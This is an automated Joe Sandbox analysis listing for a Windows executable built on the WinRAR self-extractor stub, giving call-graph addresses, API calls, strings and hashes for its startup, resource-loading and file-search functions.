293ad9 ShowWindow 29649->29653 29673 293fcf WaitForSingleObject 29650->29673 29652->29631 29682 2719a9 26 API calls 29652->29682 29653->29650 29655 293a82 29659 271a66 26 API calls 29655->29659 29660 293b3d 29657->29660 29661 293b48 29657->29661 29658 293afb 29658->29657 29664 293b08 GetExitCodeProcess 29658->29664 29662 293a8e 29659->29662 29681 288da4 CompareStringW 29660->29681 29661->29652 29665 293b73 ShowWindow 29661->29665 29662->29645 29664->29657 29666 293b19 29664->29666 29665->29652 29666->29657 29668->29628 29669->29628 29670->29624 29671->29611 29674 293fea 29673->29674 29675 29402f 29673->29675 29676 293fed PeekMessageW 29674->29676 29675->29658 29677 293fff GetMessageW TranslateMessage DispatchMessageW 29676->29677 29678 294020 WaitForSingleObject 29676->29678 29677->29678 29678->29675 29678->29676 29679->29636 29680->29655 29681->29661 29682->29631 29683 296452 29684 29645e __FrameHandler3::FrameUnwindToState 29683->29684 29715 295e63 29684->29715 29686 296465 29687 2965b8 29686->29687 29690 29648f 29686->29690 29818 296878 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 29687->29818 29689 2965bf 29811 29ee14 29689->29811 29702 2964ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 29690->29702 29726 29f9ad 29690->29726 29697 2964ae 29699 29652f 29734 296993 GetStartupInfoW _abort 29699->29734 29701 296535 29735 29f8fe 51 API calls 29701->29735 29702->29699 29814 29e9b0 38 API calls _abort 29702->29814 29705 29653d 29736 29454a 29705->29736 29709 296551 29709->29689 29710 296555 29709->29710 29711 29655e 29710->29711 29816 29edb7 28 API calls _abort 29710->29816 29817 295fd4 12 API calls ___scrt_uninitialize_crt 29711->29817 29714 296566 29714->29697 29716 295e6c 29715->29716 29820 296694 IsProcessorFeaturePresent 29716->29820 29718 295e78 29821 2996d9 10 API calls 2 library calls 29718->29821 29720 295e7d 29721 295e81 29720->29721 29822 29f837 29720->29822 29721->29686 29724 295e98 29724->29686 29727 29f9c4 29726->29727 29728 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29727->29728 29729 2964a8 29728->29729 29729->29697 29730 29f951 29729->29730 29731 29f980 29730->29731 29732 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29731->29732 29733 29f9a9 29732->29733 29733->29702 29734->29701 29735->29705 29889 286d7b 29736->29889 29739 281309 30 API calls 29740 294572 29739->29740 29971 28f4d4 29740->29971 29742 29457b _abort 29975 28f89a 29742->29975 29746 294608 GetCommandLineW 29747 2946f9 29746->29747 29748 294618 29746->29748 29749 2813f9 29 API calls 29747->29749 29750 2714a7 28 API calls 29748->29750 29751 294703 29749->29751 29752 294622 29750->29752 29753 2725a4 26 API calls 29751->29753 29754 2919ee 115 API calls 29752->29754 29755 294710 29753->29755 29756 29462c 29754->29756 29757 271a66 26 API calls 29755->29757 29758 271a66 26 API calls 29756->29758 29759 294719 SetEnvironmentVariableW GetLocalTime 29757->29759 29760 294635 29758->29760 29767 27f6ba _swprintf 51 API calls 29759->29767 29761 2946dc 29760->29761 29762 294642 OpenFileMappingW 29760->29762 29764 2714a7 28 API calls 29761->29764 29765 29465b MapViewOfFile 29762->29765 29766 2946d2 CloseHandle 29762->29766 29768 2946e6 29764->29768 29765->29766 29769 29466b UnmapViewOfFile MapViewOfFile 29765->29769 29766->29747 29770 29477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 29767->29770 29772 293efc 30 API calls 29768->29772 29769->29766 29773 294689 29769->29773 29771 2907e5 31 API calls 29770->29771 29774 2947bc 29771->29774 29775 2946f0 29772->29775 29776 28fc38 28 API calls 29773->29776 29777 283538 133 API calls 29774->29777 29778 271a66 26 API calls 29775->29778 29779 294699 29776->29779 29780 2947cc 29777->29780 29778->29747 29781 293efc 30 API calls 29779->29781 29782 28d255 28 API calls 29780->29782 29783 2946a2 29781->29783 29784 2947d8 29782->29784 29785 285109 114 API calls 29783->29785 29786 28d255 28 API calls 29784->29786 29787 2946b5 29785->29787 29788 2947e1 DialogBoxParamW 29786->29788 29789 2851bf 114 API calls 29787->29789 29790 28d347 26 API calls 29788->29790 29791 2946c0 29789->29791 29792 29481e 29790->29792 29794 2946cb UnmapViewOfFile 29791->29794 29793 28d347 26 API calls 29792->29793 29795 29482a 29793->29795 29794->29766 29796 294833 Sleep 29795->29796 29798 29483a 29795->29798 29796->29798 29797 294848 29800 294852 DeleteObject 29797->29800 29798->29797 29799 28fb4b 48 API calls 29798->29799 29799->29797 29801 29486e 29800->29801 29802 294867 DeleteObject 29800->29802 29803 29489e 29801->29803 29804 2948b0 29801->29804 29802->29801 29805 293fcf 6 API calls 29803->29805 29806 28f53a GdiplusShutdown CoUninitialize 29804->29806 29807 2948a4 CloseHandle 29805->29807 29808 2948ea 29806->29808 29807->29804 29809 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29808->29809 29810 2948fd 29809->29810 29815 2969c9 GetModuleHandleW 29810->29815 30038 29eb91 29811->30038 29814->29699 29815->29709 29816->29711 29817->29714 29818->29689 29820->29718 29821->29720 29826 2a2d0a 29822->29826 29825 2996f8 7 API calls 2 library calls 29825->29721 29829 2a2d27 29826->29829 29830 2a2d23 29826->29830 29827 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29828 295e8a 29827->29828 29828->29724 29828->29825 29829->29830 29832 2a1320 29829->29832 29830->29827 29833 2a132c __FrameHandler3::FrameUnwindToState 29832->29833 29844 2a18e1 EnterCriticalSection 29833->29844 29835 2a1333 29845 2a31d8 29835->29845 29837 2a1342 29838 2a1351 29837->29838 29858 2a11b0 29 API calls 29837->29858 29860 2a136d LeaveCriticalSection _abort 29838->29860 29841 2a1362 _abort 29841->29829 29842 2a134c 29859 2a1266 GetStdHandle GetFileType 29842->29859 29844->29835 29846 2a31e4 __FrameHandler3::FrameUnwindToState 29845->29846 29847 2a3208 29846->29847 29848 2a31f1 29846->29848 29861 2a18e1 EnterCriticalSection 29847->29861 29869 2a01d3 20 API calls _abort 29848->29869 29851 2a31f6 29870 29ac8e 26 API calls _abort 29851->29870 29852 2a3214 29855 2a3240 29852->29855 29862 2a3129 29852->29862 29854 2a3200 _abort 29854->29837 29871 2a3267 LeaveCriticalSection _abort 29855->29871 29858->29842 29859->29838 29860->29841 29861->29852 29872 2a1de6 29862->29872 29864 2a313b 29868 2a3148 29864->29868 29885 2a1bba 11 API calls 2 library calls 29864->29885 29867 2a319a 29867->29852 29879 2a03d4 29868->29879 29869->29851 29870->29854 29871->29854 29877 2a1df3 _abort 29872->29877 29873 2a1e33 29887 2a01d3 20 API calls _abort 29873->29887 29874 2a1e1e RtlAllocateHeap 29875 2a1e31 29874->29875 29874->29877 29875->29864 29877->29873 29877->29874 29886 29e91a 7 API calls 2 library calls 29877->29886 29880 2a03df RtlFreeHeap 29879->29880 29881 2a0408 __dosmaperr 29879->29881 29880->29881 29882 2a03f4 29880->29882 29881->29867 29888 2a01d3 20 API calls _abort 29882->29888 29884 2a03fa GetLastError 29884->29881 29885->29864 29886->29877 29887->29875 29888->29884 29991 295b20 29889->29991 29892 286e28 29894 28719b 29892->29894 30022 29e50e 42 API calls 2 library calls 29892->30022 29893 286dd3 GetProcAddress 29895 286dfd GetProcAddress 29893->29895 29896 286de5 29893->29896 29899 2813f9 29 API calls 29894->29899 29895->29892 29898 286e0f 29895->29898 29896->29895 29898->29892 29901 2871a6 29899->29901 29900 287098 29900->29894 29903 2813f9 29 API calls 29900->29903 29902 282117 45 API calls 29901->29902 29925 2871ba 29902->29925 29904 2870ac 29903->29904 29905 2870ba 29904->29905 29906 2870bd CreateFileW 29904->29906 29905->29906 29908 2870db SetFilePointer 29906->29908 29909 287186 CloseHandle 29906->29909 29908->29909 29910 2870ed ReadFile 29908->29910 29911 271a66 26 API calls 29909->29911 29910->29909 29912 287109 29910->29912 29913 287199 29911->29913 29916 28711a 29912->29916 29917 2873f2 29912->29917 29913->29894 29915 2714a7 28 API calls 29915->29925 29919 2714a7 28 API calls 29916->29919 30025 295ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 29917->30025 29926 287133 29919->29926 29920 2873f7 29921 2871de CompareStringW 29921->29925 29922 28229d 45 API calls 29922->29925 29923 271a66 26 API calls 29923->29925 29925->29915 29925->29921 29925->29922 29925->29923 29927 27ed1f 49 API calls 29925->29927 29940 287248 29925->29940 29993 28067e 29925->29993 29998 286c5e 29925->29998 29928 287176 29926->29928 29932 286c5e 30 API calls 29926->29932 30023 286366 28 API calls 29926->30023 29927->29925 29931 271a66 26 API calls 29928->29931 29929 2873bd 29934 271a66 26 API calls 29929->29934 29930 28729e 30024 282187 45 API calls 29930->30024 29935 28717e 29931->29935 29932->29926 29938 2873c5 29934->29938 29939 271a66 26 API calls 29935->29939 29936 2714a7 28 API calls 29936->29940 29937 2872a7 29941 28067e 6 API calls 29937->29941 29942 271a66 26 API calls 29938->29942 29939->29909 29940->29936 29943 28229d 45 API calls 29940->29943 29949 271a66 26 API calls 29940->29949 29953 27ed1f 49 API calls 29940->29953 29959 287292 29940->29959 29944 2872ac 29941->29944 29945 2873cd 29942->29945 29943->29940 29946 287332 29944->29946 29947 2872b3 29944->29947 29948 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29945->29948 29951 286a25 53 API calls 29946->29951 29950 286c5e 30 API calls 29947->29950 29952 2873e8 29948->29952 29949->29940 29954 2872bd 29950->29954 29955 28735b AllocConsole 29951->29955 29952->29739 29953->29940 29956 286c5e 30 API calls 29954->29956 29957 287368 GetCurrentProcessId AttachConsole 29955->29957 29970 287310 29955->29970 29960 2872c7 29956->29960 29958 287383 29957->29958 29965 28738c GetStdHandle WriteConsoleW Sleep FreeConsole 29958->29965 29959->29929 29959->29930 29961 284318 53 API calls 29960->29961 29962 2872ec 29961->29962 29964 286a25 53 API calls 29962->29964 29963 2873b5 ExitProcess 29966 2872f6 29964->29966 29965->29970 29967 284318 53 API calls 29966->29967 29968 287307 29967->29968 29969 2714a7 28 API calls 29968->29969 29969->29970 29970->29963 29972 286c5e 30 API calls 29971->29972 29973 28f4e8 OleInitialize 29972->29973 29974 28f50b GdiplusStartup SHGetMalloc 29973->29974 29974->29742 29976 2725a4 26 API calls 29975->29976 29977 28f8a8 29976->29977 29978 2725a4 26 API calls 29977->29978 29979 28f8b4 29978->29979 29980 2725a4 26 API calls 29979->29980 29981 28f8c0 29980->29981 29982 2725a4 26 API calls 29981->29982 29983 28f8cc 29982->29983 29984 28f84c 29983->29984 29985 271a66 26 API calls 29984->29985 29986 28f857 29985->29986 29987 271a66 26 API calls 29986->29987 29988 28f85f 29987->29988 29989 271a66 26 API calls 29988->29989 29990 28f867 29989->29990 29992 286d8d GetModuleHandleW 29991->29992 29992->29892 29992->29893 29994 2806a4 GetVersionExW 29993->29994 29995 2806d1 29993->29995 29994->29995 29996 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29995->29996 29997 2806fa 29996->29997 29997->29925 29999 286c6a __EH_prolog3_GS 29998->29999 30000 2956f6 28 API calls 29999->30000 30001 286c77 30000->30001 30002 286c8d GetSystemDirectoryW 30001->30002 30003 286cab 30002->30003 30020 286ca4 30002->30020 30004 2714a7 28 API calls 30003->30004 30005 286ccd 30004->30005 30007 2714a7 28 API calls 30005->30007 30006 286d71 30009 295787 5 API calls 30006->30009 30010 286cda 30007->30010 30008 2712a7 26 API calls 30008->30006 30011 286d78 30009->30011 30026 281ad1 30010->30026 30011->29925 30014 271a66 26 API calls 30015 286cf7 30014->30015 30016 271a66 26 API calls 30015->30016 30017 286cff LoadLibraryW 30016->30017 30019 286d1c 30017->30019 30017->30020 30019->30020 30036 2719a9 26 API calls 30019->30036 30020->30006 30020->30008 30022->29900 30023->29926 30024->29937 30025->29920 30027 281add __EH_prolog3_GS 30026->30027 30028 277673 28 API calls 30027->30028 30029 281aef 30028->30029 30031 281b0c 30029->30031 30037 280ddb 28 API calls 30029->30037 30032 271a66 26 API calls 30031->30032 30033 281b35 30032->30033 30034 295787 5 API calls 30033->30034 30035 281b3a 30034->30035 30035->30014 30036->30020 30037->30031 30039 29eb9d _abort 30038->30039 30040 29eba4 30039->30040 30041 29ebb6 30039->30041 30074 29eceb GetModuleHandleW 30040->30074 30062 2a18e1 EnterCriticalSection 30041->30062 30044 29eba9 30044->30041 30075 29ed2f GetModuleHandleExW 30044->30075 30045 29ec5b 30063 29ec9b 30045->30063 30048 29ebbd 30048->30045 30050 29ec32 30048->30050 30083 29f6a0 20 API calls _abort 30048->30083 30054 29ec4a 30050->30054 30059 29f951 _abort 5 API calls 30050->30059 30052 29ec78 30066 29ecaa 30052->30066 30053 29eca4 30084 2a8fc0 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30053->30084 30055 29f951 _abort 5 API calls 30054->30055 30055->30045 30059->30054 30062->30048 30085 2a1931 LeaveCriticalSection 30063->30085 30065 29ec74 30065->30052 30065->30053 30086 2a1d26 30066->30086 30069 29ecd8 30072 29ed2f _abort 8 API calls 30069->30072 30070 29ecb8 GetPEB 30070->30069 30071 29ecc8 GetCurrentProcess TerminateProcess 30070->30071 30071->30069 30073 29ece0 ExitProcess 30072->30073 30074->30044 30076 29ed59 GetProcAddress 30075->30076 30077 29ed7c 30075->30077 30080 29ed6e 30076->30080 30078 29ed8b 30077->30078 30079 29ed82 FreeLibrary 30077->30079 30081 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 30078->30081 30079->30078 30080->30077 30082 29ebb5 30081->30082 30082->30041 30083->30050 30085->30065 30087 2a1d4b 30086->30087 30088 2a1d41 30086->30088 30093 2a1948 5 API calls _abort 30087->30093 30090 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 30088->30090 30091 29ecb4 30090->30091 30091->30069 30091->30070 30092 2a1d62 30092->30088 30093->30092 30094 294d22 30095 294ce9 30094->30095 30095->30094 30096 294fce ___delayLoadHelper2@8 17 API calls 30095->30096 30096->30095 30097 294a07 30099 294910 30097->30099 30098 294fce ___delayLoadHelper2@8 17 API calls 30098->30099 30099->30098

                                        Executed Functions

                                        Function 0029454A Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 252filesleeptimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 379 29454a-294612 call 286d7b call 281309 call 28f4d4 call 2971f0 call 28f89a call 28f84c GetCommandLineW 392 2946f9-294722 call 2813f9 call 2725a4 call 271a66 379->392 393 294618-29463c call 2714a7 call 2919ee call 271a66 379->393 408 294729-294831 SetEnvironmentVariableW GetLocalTime call 27f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call 2907e5 call 283538 call 28d255 * 2 DialogBoxParamW call 28d347 * 2 392->408 409 294724 392->409 406 2946dc-2946f4 call 2714a7 call 293efc call 271a66 393->406 407 294642-294659 OpenFileMappingW 393->407 406->392 411 29465b-294669 MapViewOfFile 407->411 412 2946d2-2946da CloseHandle 407->412 443 29483a-294841 408->443 444 294833-294834 Sleep 408->444 409->408 411->412 415 29466b-294687 UnmapViewOfFile MapViewOfFile 411->415 412->392 415->412 419 294689-2946cc call 28fc38 call 293efc call 285109 call 2851bf call 2851f8 UnmapViewOfFile 415->419 419->412 445 294848-294865 call 285041 DeleteObject 443->445 446 294843 call 28fb4b 443->446 444->443 450 29486e-294874 445->450 451 294867-294868 DeleteObject 445->451 446->445 452 29488e-29489c 450->452 453 294876-29487d 450->453 451->450 455 29489e-2948aa call 293fcf CloseHandle 452->455 456 2948b0-2948bd 452->456 453->452 454 29487f-294889 call 2794b8 453->454 454->452 455->456 459 2948bf-2948cb 456->459 460 2948e1-2948e5 call 28f53a 456->460 463 2948db-2948dd 459->463 464 2948cd-2948d5 459->464 466 2948ea-294903 call 295734 460->466 463->460 465 2948df 463->465 464->460 467 2948d7-2948d9 464->467 465->460 467->460
                                        APIs
                                          • Part of subcall function 00286D7B: GetModuleHandleW.KERNEL32(kernel32,D946AC94), ref: 00286DC7
                                          • Part of subcall function 00286D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00286DD9
                                          • Part of subcall function 00286D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00286E03
                                          • Part of subcall function 00281309: __EH_prolog3.LIBCMT ref: 00281310
                                          • Part of subcall function 00281309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002817FB,?,?,\\?\,D946AC94,?,?,?,00000000,002AA279,000000FF), ref: 00281319
                                          • Part of subcall function 0028F4D4: OleInitialize.OLE32(00000000), ref: 0028F4ED
                                          • Part of subcall function 0028F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028F524
                                          • Part of subcall function 0028F4D4: SHGetMalloc.SHELL32(002C532C), ref: 0028F52E
                                        • GetCommandLineW.KERNEL32 ref: 00294608
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 0029464F
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00294661
                                        • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0029466F
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 0029467D
                                          • Part of subcall function 0028FC38: __EH_prolog3.LIBCMT ref: 0028FC3F
                                          • Part of subcall function 00293EFC: __EH_prolog3_GS.LIBCMT ref: 00293F03
                                          • Part of subcall function 00293EFC: SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00293F1B
                                          • Part of subcall function 00293EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00293F86
                                          • Part of subcall function 002851BF: _wcslen.LIBCMT ref: 002851E3
                                        • UnmapViewOfFile.KERNEL32(00000000,002C5430,00000400,002C5430,002C5430,00000400,00000000,00000001,?,00000000), ref: 002946CC
                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002946D3
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,002B9698,00000000), ref: 0029472F
                                        • GetLocalTime.KERNEL32(?), ref: 0029473A
                                        • _swprintf.LIBCMT ref: 00294779
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0029478E
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00294795
                                        • LoadIconW.USER32(00000000,00000064), ref: 002947AC
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00294803
                                        • Sleep.KERNELBASE(00001B58), ref: 00294834
                                        • DeleteObject.GDI32 ref: 00294858
                                        • DeleteObject.GDI32(00050D57), ref: 00294868
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 002919EE: __EH_prolog3_GS.LIBCMT ref: 002919F5
                                        • CloseHandle.KERNEL32 ref: 002948AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0T,$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                        • API String ID: 3142445277-246775543
                                        • Opcode ID: 781579dd803830d633f23b075ba56370645f84a1345a251353c9c7e9b3db6fc9
                                        • Instruction ID: 3519402e2a4fac0b4e98a9cce6cc3cf43f7cacc5e4c5e69b2a8ae0d63b9b41d1
                                        • Opcode Fuzzy Hash: 781579dd803830d633f23b075ba56370645f84a1345a251353c9c7e9b3db6fc9
                                        • Instruction Fuzzy Hash: C491DE70524750AFC720BF64EC49FAB77ECAB49700F40492DF54992291EB74E8A5CF21
                                        Function 0028EBD3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 725 28ebd3-28ebf0 FindResourceW 726 28ecec 725->726 727 28ebf6-28ec07 SizeofResource 725->727 729 28ecee-28ecf2 726->729 727->726 728 28ec0d-28ec1c LoadResource 727->728 728->726 730 28ec22-28ec2d LockResource 728->730 730->726 731 28ec33-28ec48 GlobalAlloc 730->731 732 28ec4e-28ec57 GlobalLock 731->732 733 28ece4-28ecea 731->733 734 28ecdd-28ecde GlobalFree 732->734 735 28ec5d-28ec7b call 296c70 CreateStreamOnHGlobal 732->735 733->729 734->733 738 28ec7d-28ec9f call 28eb06 735->738 739 28ecd6-28ecd7 GlobalUnlock 735->739 738->739 744 28eca1-28eca9 738->744 739->734 745 28ecab-28ecbf GdipCreateHBITMAPFromBitmap 744->745 746 28ecc4-28ecd2 744->746 745->746 747 28ecc1 745->747 746->739 747->746
                                        APIs
                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00290845,00000066), ref: 0028EBE6
                                        • SizeofResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EBFD
                                        • LoadResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC14
                                        • LockResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC23
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00290845,00000066), ref: 0028EC3E
                                        • GlobalLock.KERNEL32(00000000), ref: 0028EC4F
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028EC73
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0028ECD7
                                          • Part of subcall function 0028EB06: GdipAlloc.GDIPLUS(00000010), ref: 0028EB0C
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028ECB8
                                        • GlobalFree.KERNEL32(00000000), ref: 0028ECDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                        • String ID: PNG
                                        • API String ID: 211097158-364855578
                                        • Opcode ID: 00eaa323269f3fe69467d77b409a72bedbd2f5236884fa91981816e746213d4b
                                        • Instruction ID: 1031e79bee05b8eab204ff992586b31f109d30c56b466ece2d2496d9527378f7
                                        • Opcode Fuzzy Hash: 00eaa323269f3fe69467d77b409a72bedbd2f5236884fa91981816e746213d4b
                                        • Instruction Fuzzy Hash: 54315E75A11202ABDB10AF61ED4CD2BBFACFF45754B15052AF916D22A1EF31D821CB60
                                        Function 0028355D Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 753COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00288781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,D946AC94,00000007,?,?,?,00288751,?,?,?,?,0000000C,00274426), ref: 0028879D
                                        • _wcslen.LIBCMT ref: 0028395A
                                        • __fprintf_l.LIBCMT ref: 00283AA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                        • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                        • API String ID: 1796436225-285229759
                                        • Opcode ID: 7ffcea3c7c17757cf834fdc9367277dec0f138ae27eb4a3e735a4b66ff53fbc4
                                        • Instruction ID: b38cbeaa1ed3b52f3138bd7f9b63f07c4892c49ac6265262b34c4e0d3de57e61
                                        • Opcode Fuzzy Hash: 7ffcea3c7c17757cf834fdc9367277dec0f138ae27eb4a3e735a4b66ff53fbc4
                                        • Instruction Fuzzy Hash: 5F52F675921259AFDF24EFA8CC45AEDB7B4FF04B10F10052AE805EB2C1EB719A64CB50
                                        Function 0027F826 Relevance: 9.1, APIs: 6, Instructions: 139fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1006 27f826-27f841 call 2957d8 1009 27f847-27f84d 1006->1009 1010 27f925-27f935 FindNextFileW 1006->1010 1011 27f851-27f864 FindFirstFileW 1009->1011 1012 27f84f 1009->1012 1013 27f937-27f946 GetLastError 1010->1013 1014 27f948-27f9fa call 2725c3 call 2714a7 call 28229d call 271a66 call 287c44 * 3 1010->1014 1011->1014 1015 27f86a-27f88e call 28169a 1011->1015 1012->1011 1016 27f91d-27f920 1013->1016 1019 27f9ff-27fa0a call 295787 1014->1019 1025 27f890-27f897 1015->1025 1026 27f8ac-27f8b6 1015->1026 1016->1019 1029 27f89c-27f8aa FindFirstFileW 1025->1029 1030 27f899 1025->1030 1031 27f8fd-27f900 1026->1031 1032 27f8b8-27f8d3 1026->1032 1029->1026 1030->1029 1031->1014 1034 27f902-27f90b GetLastError 1031->1034 1035 27f8d5-27f8ee call 2719a9 1032->1035 1036 27f8f4-27f8fc call 295726 1032->1036 1039 27f90d-27f910 1034->1039 1040 27f91b 1034->1040 1035->1036 1036->1031 1039->1040 1044 27f912-27f915 1039->1044 1040->1016 1044->1040 1047 27f917-27f919 1044->1047 1047->1016
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027F830
                                        • FindFirstFileW.KERNELBASE(?,?,00000274,0027F733,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?), ref: 0027F859
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F8A4
                                        • GetLastError.KERNEL32(?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049,?,00000000), ref: 0027F902
                                        • FindNextFileW.KERNEL32(?,?,00000274,0027F733,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?), ref: 0027F92D
                                        • GetLastError.KERNEL32(?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049,?,00000000), ref: 0027F93A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                        • String ID:
                                        • API String ID: 3831798110-0
                                        • Opcode ID: a57e6b2f4e7bf4807325cd940e44dd60c6cfb9df065d5fe9d8cecfad8bc15a7f
                                        • Instruction ID: 5176c06063edca632fe663cf018f64465b67cab9c5e13da352cb8bbe2ad6512b
